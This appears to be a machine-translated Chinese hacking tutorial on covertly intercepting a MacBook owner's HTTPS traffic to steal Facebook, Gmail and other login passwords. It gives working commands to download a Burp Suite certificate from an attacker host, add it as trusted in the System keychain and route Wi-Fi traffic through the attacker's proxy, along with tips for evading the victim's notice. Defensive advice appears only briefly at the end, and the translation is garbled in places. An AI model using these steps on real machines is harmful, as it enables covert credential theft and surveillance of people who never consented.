只需幾個(gè)命令即可操作MacBook的安全HTTPS流量，并從加密數(shù)據(jù)中提取登錄密碼。讓我們通過(guò)實(shí)時(shí)截取Safari和谷歌Chrome網(wǎng)絡(luò)流量，將Facebook和Gmail黑客攻擊提升到新的水平。

Facebook和Gmail都有出色的Web應(yīng)用程序安全實(shí)踐。他們很快將黑名單列入黑名單，以便在僅幾次失敗的登錄嘗試后執(zhí)行暴力攻擊和鎖定帳戶。

此外，通過(guò)新IP地址或不同的Web瀏覽器進(jìn)行的成功登錄將觸發(fā)這些網(wǎng)站進(jìn)一步驗(yàn)證登錄;?這可能意味著將目標(biāo)的童年朋友與他們的Facebook個(gè)人資料圖片匹配，或者提供發(fā)送到目標(biāo)智能手機(jī)的一次性使用代碼。

事實(shí)上，通常會(huì)更容易破壞目標(biāo)的操作系統(tǒng)來(lái)獲取憑據(jù)而不是猜測(cè)目標(biāo)的用戶密碼。

• 不要錯(cuò)過(guò)：如何用自毀的有效載荷來(lái)破解Mojave 10.14

本文特別側(cè)重于在共享的Wi-Fi網(wǎng)絡(luò)上學(xué)習(xí)目標(biāo)macOS用戶的Facebook和Gmail密碼。接下來(lái)，讀者需要訪問(wèn)目標(biāo)的MacBook才能執(zhí)行此攻擊。這可以使用各種方法完成;?只需一些物理訪問(wèn)時(shí)間，MacBook就可以使用單用戶模式攻擊進(jìn)行攻擊。或者，將目標(biāo)社交工程化為在USB驅(qū)動(dòng)器上打開木馬化文件可能是最佳的。

了解攻擊

基本上，我們將強(qiáng)制目標(biāo)的Safari或Chrome瀏覽器將所有HTTP和HTTPS流量發(fā)送到Burp Suite代理我們控制。收到網(wǎng)絡(luò)流量后，Burp將能夠?qū)崟r(shí)解釋所有HTTPS數(shù)據(jù)。通常情況下，此類活動(dòng)是不可能的，但我們會(huì)秘密配置目標(biāo)操作系統(tǒng)，使其信任我們的代理使用的SSL證書。

對(duì)于之前已將瀏覽器配置為使用Burp代理的讀者來(lái)說(shuō)，這正是我們對(duì)目標(biāo)瀏覽器所做的 - 但完全沒(méi)有他們的知識(shí)。

• 不要錯(cuò)過(guò)：使用Burp Suite和SQL Injection攻擊Web應(yīng)用程序

我們首先在Kali Linux中設(shè)置Burp以攔截流量。然后，從我們的后門，我們將下載并將Burp證書導(dǎo)入目標(biāo)的鑰匙串，以便他們的Safari或Chrome瀏覽器不會(huì)提醒他們?nèi)魏慰梢傻淖C書活動(dòng)。最后，我們將配置MacBook以將所有HTTP和HTTPS流量發(fā)送到我們的Burp代理。

我們的攻擊需要root權(quán)限，因?yàn)闊o(wú)法將證書作為普通用戶導(dǎo)入macOS Keychain。根可以通過(guò)物理backdooring目標(biāo)的MacBook或執(zhí)行特權(quán)升級(jí)攻擊，比如可以實(shí)現(xiàn)密碼的釣魚網(wǎng)站，利用帝國(guó)到轉(zhuǎn)儲(chǔ)目標(biāo)的密碼哈希，或者傾銷他們的瀏覽器緩存，或許發(fā)現(xiàn)他們經(jīng)常重復(fù)使用的密碼。

• 不要錯(cuò)過(guò)：如何使用一個(gè)Ruby命令破解MacBook

步驟1安裝Burp Suite（如有必要）

根據(jù)您的Kali Linux版本，可能尚未安裝Burp Suite。要安裝Burp，請(qǐng)使用以下apt-get命令。

apt-get update && apt-get install burpsuite

第2步設(shè)置Burp套件

打開Burp，單擊“代理”選項(xiàng)卡，然后單擊“選項(xiàng)”選項(xiàng)卡，并單擊“?代理偵聽(tīng)器?”下的“編輯”按鈕。在指定的位置輸入所需的綁定端口;?我使用的是9999，因?yàn)樗苋菀子涀?，但是，這個(gè)數(shù)字是任意的。

接下來(lái)，指定要監(jiān)聽(tīng)的地址;?此攻擊適用于本地網(wǎng)絡(luò)，因此應(yīng)使用192.168.1.xx地址。我在內(nèi)部實(shí)驗(yàn)室中執(zhí)行此操作，因此攻擊者的本地IP地址為10.42.0.1。如果有疑問(wèn)，請(qǐng)使用“所有接口”選項(xiàng)。

單擊“確定”以保存更改。然后，導(dǎo)航回“攔截”選項(xiàng)卡并確?！皵r截已關(guān)閉”。禁用此選項(xiàng)將允許目標(biāo)的Web流量不間斷地流動(dòng)，同時(shí)繼續(xù)將我們的設(shè)備用作代理。

• 不要錯(cuò)過(guò)：如何秘密地直播某人的MacBook屏幕

第3步下載Burp證書

利用我們的后門進(jìn)入MacBook，我們首先需要從我們的Burp代理下載Burp證書。使用下面的curl命令執(zhí)行此操作。

curl -s --insecure --proxy http://10.42.0.1:9999 http://burp/cert -o /tmp/burp.der

在上面的命令中，curl將默默地（-s）從我們的Kali機(jī)器下載證書。該--proxy因?yàn)槲覀冎甘揪砬褂眯屡渲玫拇蜞帽O(jiān)聽(tīng)來(lái)獲取證書參數(shù)是必需的;?curl（或任何Web瀏覽器）默認(rèn)不信任此證書，因此需要--insecure參數(shù)忽略輸出中的警告。最后，將Burp證書（-o）保存到/ tmp目錄，文件名為burp.der。.der文件擴(kuò)展名僅是證書的默認(rèn)文件格式，不應(yīng)更改。

第4步導(dǎo)入Burp證書

現(xiàn)在，使用以下安全性命令導(dǎo)入下載到目標(biāo)的Keychain中的Burp證書。

security add-trusted-cert -k /Library/Keychains/System.keychain -d /tmp/burp.der

安全性將添加（add-trusted-cert）并完全信任證書（-d /tmp/burp.der）到macOS主系統(tǒng)Keychain（-k）中。我們現(xiàn)在要做的就是配置macOS向我們發(fā)送所有目標(biāo)的網(wǎng)絡(luò)流量。

步驟5配置MacBook代理設(shè)置

此時(shí)，我們可以使用我們的后門靜默配置目標(biāo)MacBook，以便向我們發(fā)送其所有HTTP和HTTPS Web流量。

網(wǎng)絡(luò)設(shè)置是一個(gè)命令行工具，用于在macOS系統(tǒng)偏好設(shè)置中配置網(wǎng)絡(luò)設(shè)置。通過(guò)命令行使用networksetup就像直接在macOS中對(duì)網(wǎng)絡(luò)首選項(xiàng)進(jìn)行更改一樣，就好像我們坐在MacBook前面一樣。

使用以下networksetup命令和-listallnetworkservices參數(shù)顯示可用服務(wù)。

/usr/sbin/networksetup -listallnetworkservices

iPhone USB
Wi-Fi
Bluetooth PAN
Thunderbolt Bridge

請(qǐng)注意這里的“Wi-Fi”服務(wù)。這是我們最有可能需要修改的服務(wù)。如果目標(biāo)使用外部無(wú)線適配器，它也可能出現(xiàn)在此處。在這種情況下，攻擊者需要修改這些代理設(shè)置。

• 不要錯(cuò)過(guò)：如何使用任何人的MacBook麥克風(fēng)進(jìn)行遠(yuǎn)程竊聽(tīng)

以下-getwebproxy（HTTP）和-getsecurewebproxy（HTTPS）參數(shù)可用于查看目標(biāo)可能已自行配置的任何當(dāng)前現(xiàn)有代理設(shè)置。

/usr/sbin/networksetup -getwebproxy "Wi-Fi"

Enabled: No
Server:
Port: 0
Authenticated Proxy Enabled: 0

/usr/sbin/networksetup -getsecurewebproxy "Wi-Fi"

Enabled: No
Server:
Port: 0
Authenticated Proxy Enabled: 0

我們可以看到，HTTP和HTTPS代理都被禁用。這是一件好事，因?yàn)檫@意味著目標(biāo)可能永遠(yuǎn)不會(huì)改變他們的代理設(shè)置，如果應(yīng)用程序開始奇怪地行動(dòng)，他們就不會(huì)想到那里。

要強(qiáng)制目標(biāo)的HTTP和HTTPS Web流量通過(guò)我們的Burp代理進(jìn)行路由，請(qǐng)使用以下命令。

/usr/sbin/networksetup -setwebproxy "Wi-fi" 10.42.0.1 9999
/usr/sbin/networksetup -setsecurewebproxy "Wi-fi" 10.42.0.1 9999

請(qǐng)記住將攻擊者的IP地址（10.42.0.1）更改為本地網(wǎng)絡(luò)地址。如果您選擇使用9999以外的端口號(hào)，請(qǐng)務(wù)必在上述命令中更改該端口號(hào)。新配置的代理設(shè)置將立即生效。

第6步捕獲Facebook密碼

返回Burp Suite，導(dǎo)航到“HTTP歷史記錄”選項(xiàng)卡，實(shí)時(shí)查看目標(biāo)的網(wǎng)絡(luò)流量。密切關(guān)注在“?方法”列中找到的POST請(qǐng)求，因?yàn)樗鼈儗⒈Ａ糇钔讌f(xié)的數(shù)據(jù)。例如，F(xiàn)acebook電子郵件地址和密碼顯示在下面的屏幕截圖中。

由于Facebook明確定義了“?email =?”和“pass =?”參數(shù)，因此很容易識(shí)別目標(biāo)的電子郵件（target@email.com）及其密碼。

第7步捕獲Gmail密碼

但是，像Gmail這樣的網(wǎng)站更難管理 - 特別是當(dāng)目標(biāo)使用包含許多特殊字符的強(qiáng)密碼時(shí)。特殊字符由我們的Web瀏覽器自動(dòng)編碼，因此密碼更難以在編碼的亂碼墻中發(fā)現(xiàn)（如下所示）。

• 密碼示例：g $ FR3eDW＆ujYH6I {* 5aa

• 編碼為：g％24FR3eDW％26ujYH6I％7B *％5D5aa

我們可以看到，這就像試圖在大海撈針中找到一根針。訣竅是隔離問(wèn)題。在撰寫本文時(shí)，Gmail將用戶的編碼密碼存儲(chǔ)在“?f.req =?”參數(shù)中（如下所示）。

突出顯示整個(gè)參數(shù)，然后復(fù)制文本。然后，打開Burp中的“Decoder”選項(xiàng)卡并將編碼后的文本粘貼到頂部窗口中。單擊“解碼為”按鈕，然后選擇“URL”選項(xiàng)。

• 不要錯(cuò)過(guò)：如何在MacBook上安裝持久帝國(guó)后門

現(xiàn)在，底部窗口將以稍微可讀的格式顯示已解碼的文本。復(fù)制解碼后的文本并將其粘貼到首選文本編輯器（Gedit，Geany等）中。

我們可以看到數(shù)據(jù)以類似數(shù)組的格式用逗號(hào)（，）分隔。對(duì)于Gmail，密碼位于第八個(gè)和第九個(gè)逗號(hào)之間的引號(hào)中（如下所示）。

Facebook和Gmail只是兩個(gè)例子。對(duì)于我們攔截的每次登錄，包含電子郵件地址和密碼的參數(shù)可能會(huì)有所不同。對(duì)于以不同方式處理身份驗(yàn)證并具有最先進(jìn)安全實(shí)踐的前100個(gè)網(wǎng)站尤其如此。我們鼓勵(lì)讀者測(cè)試針對(duì)其目標(biāo)網(wǎng)站的攻擊（如果Facebook不是您的目標(biāo)），以了解它如何處理登錄參數(shù)以更輕松地定位密碼。

步驟8禁用目標(biāo)MacBook上的代理

完成攻擊后，請(qǐng)記住禁用先前配置的代理設(shè)置。否則，目標(biāo)將在您與Wi-Fi網(wǎng)絡(luò)斷開連接后很長(zhǎng)時(shí)間內(nèi)繼續(xù)將其網(wǎng)絡(luò)流量發(fā)送到您的IP地址。此類活動(dòng)可能會(huì)引起懷疑，因?yàn)槿绻麤](méi)有您的Burp代理，目標(biāo)將無(wú)法訪問(wèn)互聯(lián)網(wǎng)。

要禁用目標(biāo)MacBook上的代理設(shè)置，請(qǐng)使用以下networksetup命令。

/usr/sbin/networksetup -setwebproxystate "Wi-fi" off
/usr/sbin/networksetup -setsecurewebproxystate "Wi-fi" off

改善攻擊

有很多觀點(diǎn)可以改進(jìn)這種攻擊。

選項(xiàng)1使用Mitmproxy進(jìn)行遠(yuǎn)程黑客攻擊

作為替代方案，Mitmproxy可用于截取，檢查，修改和重放Web流量，就像Burp一樣。雖然Burp更加開發(fā)和功能齊全，但Mitmproxy有一個(gè)能夠在虛擬專用服務(wù)器上輕松運(yùn)行的命令行界面。使用VPS將允許攻擊者在不同Wi-Fi網(wǎng)絡(luò)之間移動(dòng)時(shí)攔截目標(biāo)的網(wǎng)絡(luò)流量。

選項(xiàng)2Firefox警告

配置macOS以使用Burp代理也會(huì)強(qiáng)制Firefox將其所有請(qǐng)求代理到攻擊者的設(shè)備。但是，與Safari和Chrome不同，將Burp證書導(dǎo)入macOS Keychain不會(huì)影響Firefox;?這是因?yàn)镕irefox獨(dú)立驗(yàn)證證書并且不使用macOS Keychain。如果目標(biāo)同時(shí)使用Safari或Chrome和Firefox，他們可能會(huì)注意到可疑活動(dòng)。下面是Firefox檢測(cè)Burp證書的示例。

選項(xiàng)3配置為使用macOS代理的其他應(yīng)用程序

與Firefox一樣，Spotify，Skype，Opera網(wǎng)絡(luò)瀏覽器，VLC和Thunderbird等應(yīng)用程序也可以在不使用macOS Keychain的情況下驗(yàn)證證書。這可能導(dǎo)致應(yīng)用程序通知目標(biāo)用戶可疑活動(dòng)或完全中斷。

不幸的是，在配置Burp代理之后，我沒(méi)有開始測(cè)試流行的第三方應(yīng)用程序。我們鼓勵(lì)讀者繼續(xù)這項(xiàng)研究，并在真實(shí)場(chǎng)景中執(zhí)行此攻擊之前，了解這些應(yīng)用程序是否受代理影響。

選項(xiàng)4自定義SSL證書

在本指南中，我們學(xué)會(huì)了使用Burp Suite自動(dòng)生成的默認(rèn)SSL證書。如果目標(biāo)用戶在其Safari或Chrome瀏覽器中檢查證書，他們會(huì)注意到“PortSwigger CA”證書（如下所示）。Burp Suite的創(chuàng)建者PortSwigger顯然是該證書的發(fā)行者，因此這將是一個(gè)直接的危險(xiǎn)信號(hào)。使用令人信服的域名創(chuàng)建唯一證書實(shí)際上可能會(huì)阻止目標(biāo)識(shí)別欺詐性證書。

• 不要錯(cuò)過(guò)：如何在不到2小時(shí)內(nèi)破解200個(gè)在線用戶帳戶

如何保護(hù)自己免受鑰匙串和基于SSL的攻擊

這里沒(méi)有簡(jiǎn)單的解決方案。防病毒軟件不會(huì)將導(dǎo)入的Burp證書標(biāo)記為可疑，因此我們有責(zé)任定期監(jiān)控我們的鑰匙串是否有異?；顒?dòng)。

此外，如果攻擊者具有root權(quán)限并將證書導(dǎo)入您的操作系統(tǒng) -?您需要處理更大的問(wèn)題。識(shí)別系統(tǒng)上的攻擊者可能非常困難。但是，以下解決方案可能有所幫助。

提示1檢查您的鑰匙串

我們不能依靠流行的防病毒軟件來(lái)監(jiān)管我們的證書。可以通過(guò)在Spotlight中搜索“keychain”來(lái)打開鑰匙串。不要害怕環(huán)顧四周。可以擴(kuò)展和分析證書詳細(xì)信息。如果您沒(méi)有放置某些東西，請(qǐng)不要因?yàn)檫^(guò)去安裝的合法應(yīng)用程序而感到驚慌。

對(duì)于我們不確定的證書，我們可以谷歌和/或咨詢支持社區(qū)，如Apple官方支持社區(qū)，Apple StackExchange和Information Security StackExchange。

提示2檢查代理設(shè)置

代理設(shè)置有點(diǎn)難以定位。使用Spotlight搜索“代理”，然后單擊“高級(jí)”按鈕。然后，單擊“代理”選項(xiàng)卡并突出顯示“Web代理（HTTP）”和“安全Web代理（HTTPS）”選項(xiàng)卡。如果您沒(méi)有自己設(shè)置這些代理，則可以安全地取消選中它們并單擊“確定”按鈕。

提示3檢查瀏覽器證書

在登錄網(wǎng)站之前，檢查SSL證書通常是個(gè)好主意。這可以在Safari和Chrome中完成，方法是單擊URL欄中的鎖定圖標(biāo)，然后單擊“顯示證書”或“證書”按鈕。此按鈕將打開一個(gè)帶有證書詳細(xì)信息的新停留窗口。單擊“詳細(xì)信息”選項(xiàng)，然后向下滾動(dòng)到證書底部的SHA-256和SHA-1指紋。

現(xiàn)在，使用其他設(shè)備（如另一臺(tái)筆記本電腦或智能手機(jī)），再次檢查網(wǎng)站證書并比較指紋 - 這些指紋應(yīng)完全匹配。如果您的所有設(shè)備之間的指紋不匹配，這可能是欺詐性證書生效的標(biāo)志。

提示4檢查您的網(wǎng)站流量

Wireshark是識(shí)別源自您機(jī)器的可疑流量的絕佳工具。如果攻擊者建立了后門，他們可能會(huì)使用Netcat或Python以固定的時(shí)間間隔在您和他們的服務(wù)器之間創(chuàng)建TCP連接。在下面的屏幕截圖中，我們可以看到攻擊者（10.42.0.1）在端口4444上向目標(biāo)MacBook（10.42.0.98）發(fā)出命令。

超越Facebook和Gmail黑客攻擊

雖然本文使用Facebook和Gmail作為示例，但以這種方式操縱MacBook的網(wǎng)絡(luò)流量實(shí)際上將允許攻擊者攔截目標(biāo)訪問(wèn)的每個(gè)網(wǎng)站的所有HTTPS流量。這意味著亞馬遜，Twitter，Instagram，雅虎和銀行登錄將被攔截并立即受到攻擊 - 即使目標(biāo)已經(jīng)登錄。